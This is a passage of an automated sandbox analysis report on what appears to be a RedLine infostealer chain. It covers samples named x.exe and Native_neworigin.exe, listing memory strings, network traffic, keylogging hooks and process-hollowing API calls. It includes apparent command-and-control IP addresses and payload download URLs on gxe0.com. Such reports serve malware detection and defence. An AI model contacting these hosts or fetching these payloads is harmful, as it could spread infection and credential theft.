                      Source: Native_neworigin.exe, 00000009.00000002.2403789034.0000000005169000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/jo
                      Source: Native_neworigin.exe, 00000009.00000002.2397017499.0000000000972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/jo_
                      Source: Native_neworigin.exe, 00000013.00000002.2586371750.0000000006234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
                      Source: Native_neworigin.exe, 00000013.00000002.2586371750.0000000006234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/QmKP
                      Source: Native_neworigin.exe, 00000013.00000002.2586371750.0000000006234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/rmhPz
                      Source: Native_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/$
                      Source: Native_neworigin.exe, 00000009.00000002.2431438104.0000000006990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/J
                      Source: Native_neworigin.exe, 00000009.00000002.2431438104.0000000006990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/epmanlipym
                      Source: Native_neworigin.exe, 00000009.00000002.2403789034.00000000051E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/epmanlipym~pJ
                      Source: Native_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/epmanlipymy
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: powershell.exe, 0000000B.00000002.2471994453.0000000003527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: Native_neworigin.exe, 00000009.00000002.2403789034.00000000051E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.veris
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: powershell.exe, 0000000B.00000002.2613552915.0000000006226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                      Source: powershell.exe, 0000000B.00000002.2523044269.0000000005311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: Native_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2398313780.0000000003049000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2431438104.00000000069B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
                      Source: Native_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2398313780.0000000003049000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2431438104.00000000069B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                      Source: Native_neworigin.exe, 00000009.00000002.2398313780.0000000003041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s82.gocheapweb.com
                      Source: powershell.exe, 0000000B.00000002.2523044269.0000000005311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: Native_neworigin.exe, 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2523044269.00000000051C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 0000000B.00000002.2523044269.0000000005311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 0000000B.00000002.2523044269.0000000005311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: x.exe, x.exe, 00000002.00000002.2336563661.00000000224E2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020B62000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2070075040.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020A90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2323160044.000000002217C000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2434873297.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2323160044.000000002211E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000003.2070521735.000000007F920000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2191785418.0000000002C20000.00000004.00000020.00020000.00000000.sdmp, aymtmquJ.pif, 00000008.00000000.2159641261.0000000000416000.00000002.00000001.01000000.00000008.sdmp, Juqmtmya.PIF, 00000010.00000002.2348684542.0000000002D62000.00000004.00001000.00020000.00000000.sdmp, aymtmquJ.pif, 00000011.00000000.2324949898.0000000000416000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.pmail.com
                      Source: Native_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2398313780.0000000003049000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2431438104.00000000069B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: Native_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2398313780.0000000003049000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2431438104.00000000069B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: Native_neworigin.exe, 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: powershell.exe, 0000000B.00000002.2523044269.00000000051C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: Native_neworigin.exe, 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: Native_neworigin.exe, 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: Native_neworigin.exe, 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: powershell.exe, 0000000B.00000002.2613552915.0000000006226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000B.00000002.2613552915.0000000006226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000B.00000002.2613552915.0000000006226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 0000000B.00000002.2523044269.0000000005311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: x.exe, 00000002.00000002.2165746672.00000000007D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/
                      Source: x.exe, 00000002.00000002.2275324060.0000000020B9D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_Juqmtm
                      Source: x.exe, 00000002.00000002.2275324060.0000000020BB3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2165746672.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2165746672.000000000076E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020B88000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_Juqmtmyadyy
                      Source: x.exe, 00000002.00000002.2165746672.00000000007BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_Juqmtmyadyyc
                      Source: x.exe, 00000002.00000002.2165746672.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak2/233_Juqmtmyadyyxev
                      Source: x.exe, 00000002.00000002.2165746672.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com:443/yak2/233_Juqmtmyadyy
                      Source: powershell.exe, 0000000B.00000002.2613552915.0000000006226000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                      Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49726 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49824 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49900 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, cPKWk.cs.Net Code: I3Mi2zn6x
                      Installs a global keyboard hook
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 19.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 9.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 9.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 24.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 24.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 19.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      .NET source code contains very large strings
                      Source: Trading_AIBot.exe.8.dr, cfRDgxIJtEfCD.csLong String: Length: 17605
                      Drops large PE files
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile dump: apihost.exe.10.dr 665670656Jump to dropped file
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DC8670 NtUnmapViewOfSection,2_2_02DC8670
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DC8400 NtReadVirtualMemory,2_2_02DC8400
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DC7A2C NtAllocateVirtualMemory,2_2_02DC7A2C
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DCDC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,2_2_02DCDC8C
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DCDC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,2_2_02DCDC04
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DC7D78 NtWriteVirtualMemory,2_2_02DC7D78
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DC8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,2_2_02DC8D70
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DCDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,2_2_02DCDD70
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DC7A2A NtAllocateVirtualMemory,2_2_02DC7A2A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DCDBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,2_2_02DCDBB0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DC8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,2_2_02DC8D6E
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFCode function: 16_2_02CF8670 NtUnmapViewOfSection,16_2_02CF8670
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFCode function: 16_2_02CF8400 NtReadVirtualMemory,16_2_02CF8400
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFCode function: 16_2_02CF7A2C NtAllocateVirtualMemory,16_2_02CF7A2C
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFCode function: 16_2_02CF7D78 NtWriteVirtualMemory,16_2_02CF7D78
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFCode function: 16_2_02CF8D70 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,16_2_02CF8D70
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFCode function: 16_2_02CFDD70 NtOpenFile,NtReadFile,NtClose,16_2_02CFDD70
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFCode function: 16_2_02CF86F7 NtUnmapViewOfSection,16_2_02CF86F7
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFCode function: 16_2_02CF7AC9 NtAllocateVirtualMemory,16_2_02CF7AC9
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFCode function: 16_2_02CF7A2A NtAllocateVirtualMemory,16_2_02CF7A2A
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFCode function: 16_2_02CF8D6E Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,16_2_02CF8D6E
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DCF7C8 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,2_2_02DCF7C8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DB20C42_2_02DB20C4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DBC9772_2_02DBC977
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_00408C609_2_00408C60
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_0040DC119_2_0040DC11
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_00407C3F9_2_00407C3F
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_00418CCC9_2_00418CCC
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_00406CA09_2_00406CA0
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_004028B09_2_004028B0
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_0041A4BE9_2_0041A4BE
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_004182449_2_00418244
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_004016509_2_00401650
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_00402F209_2_00402F20
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_004193C49_2_004193C4
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_0044E3F69_2_0044E3F6
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_004187889_2_00418788
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_00402F899_2_00402F89
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_00402B909_2_00402B90
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_004073A09_2_004073A0
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_008559809_2_00855980
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_00826EAF9_2_00826EAF
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_008639A39_2_008639A3
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_008251EE9_2_008251EE
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_0086515C9_2_0086515C
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_0085D5809_2_0085D580
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_00827F809_2_00827F80
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_008537809_2_00853780
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_0085C7F09_2_0085C7F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_02CC10259_2_02CC1025
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_02CC10309_2_02CC1030
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_059AF8B79_2_059AF8B7
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_059A00409_2_059A0040
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_059A9FA99_2_059A9FA9
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_059AAFF09_2_059AAFF0
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_059A4A309_2_059A4A30
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_059AD5A89_2_059AD5A8
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_059A3F7F9_2_059A3F7F
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_05A2A5009_2_05A2A500
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_05A217F89_2_05A217F8
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_05A2D9B09_2_05A2D9B0
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_05A20BE09_2_05A20BE0
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_05A237E79_2_05A237E7
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_05A237F89_2_05A237F8
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_05A20F289_2_05A20F28
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_04FDB49011_2_04FDB490
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_04FDB47011_2_04FDB470
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFCode function: 16_2_02CE20C416_2_02CE20C4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02DB44DC appears 74 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02DB46D4 appears 244 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02DC89D0 appears 45 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02DB4500 appears 33 times
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02DB4860 appears 949 times
